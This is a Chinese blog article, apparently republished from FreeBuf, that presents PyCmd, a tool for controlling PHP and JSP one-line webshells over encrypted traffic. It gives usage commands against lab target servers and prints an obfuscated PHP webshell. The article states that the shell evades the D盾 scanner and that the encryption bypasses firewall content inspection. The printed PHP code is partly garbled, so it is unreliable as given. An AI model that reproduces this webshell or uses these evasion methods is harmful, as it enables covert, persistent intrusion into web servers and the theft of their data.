浅析PyCmd加密隐形木马

之前写了一个基于python的一句话木马客户端程序,这个程序的作用大致就是为了绕过防护设备,使敏感数据能在网络里自由穿梭。由于编程能力有限,当时以python程序作为客户端,php代码作为服务端,勉强能用,但是缺乏jsp的服务端,使之功能很局限。幸好有大神caomei相助<点击阅读原文查看链接>,帮助实现了jsp端的代码,故将两者相结合,方便使用。

PyCmd适用环境

当服务器允许上传任意文件,且对文件内容不进行审计检查,但由于其网络边界有防火墙会拦截审计通信的数据。这时我们能成功上传一句话木马,然而连接菜刀的时候会出现500错误,此时可以使用pycmd工具,因为其会对互相通信的内容加密处理。

PyCmd使用

我这里准备了2个靶机,分别装有php与jsp的运行环境,用来模拟真实的网站服务器。

为了方便,我已经把服务端木马程序放到了服务器网站目录下:

php网站木马地址:10.0.3.13/test/p.php

jsp网站木马地址:

192.168.10.149:8080/headgmp/upload/2017_07_13/11.jsp

查看shell的情况:

此时,运行PyCmd.py程序:

python PyCmd.py -u http://10.0.3.13/test/p.php -p test[--proxy]

或者

python PyCmd.py -u http://192.168.10.149:8080/headgmp/upload/2017_07_13/11.jsp -p test [--proxy]

程序会自动判断输入的网站类型,这里是jsp类型的网站。

运行程序可输入以下参数:

-h 查看帮助信息 -u 网站木马地址 -p 木马shell密码 –proxy 开启本地代理(方便调试)

注:当开启本地调试,需运行Fiddler程序,或者其他抓包软件。

PyCmd数据加密

PyCmd程序的长处在于它对往来的数据进行了加密,可以绕过防火墙对数据内容的校验。

当执行cmd命令时,通过Fiddler抓包查看数据:

查看回报信息:

PyCmd木马隐身

用D盾扫描上传的木马服务端文件,显示为正常文件,成功躲过查杀(2016.9.18日检测结果)

这里演示php木马查杀:

<?php $string=’’; $password=’test’; if(isset(password])){ _POST[$password]; for(i<strlen(i+=2){ hex[hex[$i+1])); } @eval($string); }else{ echo “This is a Test!”; } ?>

工具下载

PyCmd 下载地址<点击阅读原文查看链接>

项目地址:https://github.com/tengzhangchao/PyCmd

说明:绕过防火墙检测的方法很多,这里只是提供了一种思路,pycmd是我去年写的一款工具,最近打算完善其功能,代码已经开源。

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2017-07-21

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

fireeyee解剖新型Android恶意软件

总结 你是否下载安装过体积很大但是UI或者功能很少的Android应用程序?最近,FireEye实验室移动安全研究人员发现了一种新型的手机恶意软件,在看起来普通...

1896
来自专栏DannyHoo的专栏

苹果app上线流程

Command /usr/bin/codesign failed with exit code 1

5662
来自专栏mukekeheart的iOS之旅

iOS学习——如何在mac上获取开发使用的模拟器的资源以及模拟器中每个应用的应用沙盒

如题,本文主要研究如何在mac上获取开发使用的模拟器的资源以及模拟器中每个应用的应用沙盒。做过安卓开发的小伙伴肯定很方便就能像打开资源管理器一样查看我们写到手...

3177
来自专栏张首富-小白的成长历程

CentOS使用SMTP第三方发送邮件

SMTP称为简单邮件传输协议(Simple Mail Transfer Protocal),目标是向用户提供高效、可靠的邮件传输。它的一个重要特点是它能够在传送...

2632
来自专栏向治洪

iOS开发证书管理

最近,没啥事情,就逛逛论坛,研究一些新技术,偶尔导入github上一些开源的iOS项目学习学习别人的一些写法。不过有时间,在运行别人的项目的时候,总会报一些错误...

2199
来自专栏向治洪

iOS开发证书管理

最近,没啥事情,就逛逛论坛,研究一些新技术,偶尔导入github上一些开源的iOS项目学习学习别人的一些写法。不过有时间,在运行别人的项目的时候,总会报一些错误...

2818
来自专栏前端笔记

【HTTP2.0 协议】就“腾讯云 CDN 针对 HTTP 2.0全面公测”浅谈如何启用 HTTP 2.0协议?

HTTPS 是指超文本传输安全协议(Hypertext Transfer Protocol Secure),是一种在 HTTP 协议基础上进行传输加密的安全协...

5919

在Debian 8上使用Postfix配置SPF和DKIM

SPF(发件人策略框架)是一种向邮件服务器标识允许哪些主机为给定域发送电子邮件的系统。设置SPF有助于防止您的电子邮件被归类为垃圾邮件。

2430
来自专栏ThoughtWorks

如果有10000台机器,你想怎么玩?(二)高可用 | TW洞见

今日洞见 文章作者/配图来自ThoughtWorks:高清华。 本文所有内容,包括文字、图片和音视频资料,版权均属ThoughtWorks公司所有,任何媒体、网...

36414
来自专栏雪胖纸的玩蛇日常

django 发送手机验证码

7633

扫码关注云+社区

领取腾讯云代金券